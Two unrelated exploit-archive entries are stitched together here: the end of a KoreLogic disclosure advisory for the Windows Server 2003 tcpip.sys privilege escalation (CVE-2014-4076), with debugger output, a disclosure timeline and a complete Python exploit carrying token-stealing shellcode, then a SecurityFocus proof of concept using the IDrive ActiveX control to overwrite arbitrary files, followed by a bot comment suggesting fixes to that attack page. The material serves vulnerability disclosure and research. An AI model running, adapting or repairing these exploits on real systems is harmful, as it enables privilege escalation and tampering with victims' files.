eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
nt!NtDeviceIoControlFile+0x2a:
808e912e 5d pop ebp
kd> db [ebp+2C] L?0x4
b940dd60 00 00 00 00 ....
kd> db [ebp+28] L?0x4
b940dd5c 00 00 00 00 ....
kd> db [ebp+24] L?0x4
b940dd58 20 00 00 00 ...
kd> db [ebp+20] L?0x4
b940dd54 00 11 00 00 ....
kd> db [ebp+1c] L?0x4
b940dd50 28 00 12 00 (...
kd> db [ebp+18] L?0x4
b940dd4c 58 4f bd 00 XO..
kd> db [ebp+14] L?0x4
b940dd48 00 00 00 00 ....
kd> db [ebp+10] L?0x4
b940dd44 00 00 00 00 ....
kd> db [ebp+0c] L?0x4
b940dd40 00 00 00 00 ....
kd> db [ebp+8] L?0x4
b940dd3c b8 06 00 00 ....
The inputBuffer for this call references memory at 0x1000 with
a length of 0x20.
kd> db 0x1100 L?0x20
00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................
00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "...............
After review of the tcpip.sys driver, some memory trickery
was created to control the code flow until the instruction
pointer could be controlled in a way that would be beneficial
to an attacker.
kd> db 0x28 L?0x11
00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............
00000038 01
eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
0000002a ff ???
Since the instruction pointer now contains 0x0000002a,
exploitation becomes trivial. Merely allocating the desired
payload for execution at this memory address will allow for
unprivileged users to run their payload within a privileged
process.
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this
vulnerability, the details of which are presented
in the vendor's public acknowledgment MS14-070
(https://technet.microsoft.com/library/security/MS14-070).
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft requests PoC.
2014.04.29 - KoreLogic resends PoC from the initial contact
email.
2014.04.29 - Microsoft acknowledges receipt of vulnerability
report.
2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to
investigate the vulnerability.
2014.04.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.05.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgment of the
initial report. KoreLogic requests CVE number for
the vulnerability, if there is one. KoreLogic
also requests vendor's public identifier for the
vulnerability along with the expected disclosure
date.
2014.06.24 - KoreLogic informs Microsoft that no response was
received following the 06.11.14 email. KoreLogic
requests CVE number for the vulnerability, if
there is one. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.06.24 - Microsoft replies to KoreLogic that they have
reproduced the vulnerability and are determining
how to proceed with the supplied information.
They are not able to provide a CVE or an expected
disclosure date.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report
and PoC.
2014.07.17 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.08.18 - Microsoft notifies KoreLogic that they have a CVE
but are not willing to share it with KoreLogic at
this time.
2014.09.08 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.09.11 - Microsoft responds saying that the vulnerability
is expected to be disclosed in "a Fall release"
and that "it is currently looking good for
October." Does not provide CVE.
2014.09.24 - Microsoft informs KoreLogic that there was a
packaging issue and that the patch will be pushed
to November.
2014.11.03 - Microsoft confirms the patch will ship in November.
2014.11.11 - Vulnerability publicly disclosed by Microsoft as
issue MS14-070 with CVE-2014-4076.
2015.01.28 - KoreLogic releases advisory.
7. Exploit
"""
#!/usr/bin/python2
#
# KL-001-2015-001 / MS14-070 / CVE-2014-4076
# Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation
# Matt Bergin @ KoreLogic / Level @ Smash the Stack
# shout out to bla
#
from optparse import OptionParser
from subprocess import Popen
from os.path import exists
from struct import pack
from time import sleep
from ctypes import *
from sys import exit
CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory =
windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory
DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
def spawn_process(path):
process = Popen([path],shell=True)
pid = process.pid
return
def main():
print "CVE-2014-4076 x86 exploit, Level\n"
global pid, process
parser = OptionParser()
parser.add_option("--path",dest="path",help="path of process to start and elevate")
parser.add_option("--pid",dest="pid",help="pid of running process to elevate")
o,a = parser.parse_args()
if (o.path == None and o.pid == None):
print "[!] no path or pid set"
exit(1)
else:
if (o.path != None):
if (exists(o.path) != True):
print "[!] path does not exist"
exit(1)
else:
Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start()
if (o.pid != None):
try:
pid = int(o.pid)
except:
print "[!] could not convert PID to an interger."
exit(1)
while True:
if ("pid" not in globals()):
sleep(1)
else:
print "[+] caught attacker cmd at %s, elevating now" % (pid)
break
buf =
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
sc =
"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid))
sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba")
sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00")
handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[!] could not open handle into the Tcp device"
exit(1)
print "[+] allocating memory"
ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40)
if (ret_one != 0):
print "[!] could not allocate memory..."
exit(1)
print "[+] writing relevant memory..."
ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))
ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))
ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0)))
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))
print "[+] attack setup done, crane kick!"
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)
CloseHandle(handle)
exit(0)
if __name__=="__main__":
main()
"""
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""

View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/48582/info
Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.
<html>
<object classid=&#039;clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E&#039; id=&#039;target&#039; /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = &#039;vbscript&#039;>
Sub Boom()
arg1="FilePath\File_name_to_rewrite_or_create"
arg2=1
arg3="New_File_Content"
target.Text=arg3
target.SelStart=0
target.SelEnd=Len(arg3)
target.SaveToFIle arg1,arg2
End Sub
</script>
</html>
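Review bot: the attribute quoting on the object and script lines is HTML-entity-encoded (&#039; where the PoC needs a literal ') and the object element is written as a self-closing `<object ... />` immediately followed by `</object>`, which is the SecurityFocus page's rendering rather than the markup the PoC author wrote; the file should carry literal quotes and a single open/close object pair so the page parses as intended. The method call is spelled SaveToFIle; VBScript is case-insensitive so it still resolves, but a consistent SaveToFile spelling would avoid it reading as a typo. The first three lines of the file are the BID summary and state only that version 3.4.0 is affected, so the file header should also record that the PoC is reproduced from the BID rather than verified against a specific control build.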